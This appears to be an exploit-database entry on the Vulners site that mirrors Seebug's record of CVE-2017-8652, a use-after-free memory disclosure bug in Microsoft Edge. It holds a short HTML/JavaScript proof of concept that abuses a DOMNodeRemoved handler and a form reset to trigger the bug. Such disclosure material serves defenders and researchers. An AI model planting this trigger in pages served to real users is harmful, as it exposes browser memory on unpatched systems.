Lucene search
K

Microsoft Edge Information Disclosure Vulnerability(CVE-2017-8652)

🗓️ 17 Aug 2017 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 38 Views

Microsoft Edge use-after free vulnerability leads to memory disclosure on Windows 10 Enterprise 64-bit version 1607 with Edge 38.14393.1066.

Related
Code

                                                <!-- saved from url=(0014)about:internet -->
<script>
var n = 0;
function go() {
  document.addEventListener("DOMNodeRemoved", eventhandler);
  eventhandler();
}
function eventhandler() {
  n++; if(n==5) return; //prevent going into an infinite recursion
  t.defaultValue = "aaaaaaaaaaaaaaaaaaaa";
  f.reset();
}
</script>
<body onload=go()>
<form id="f">
<textarea id="t">aaa</textarea>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Aug 2017 00:00Current
6.4Medium risk
Vulners AI Score6.4
EPSS0.61658
38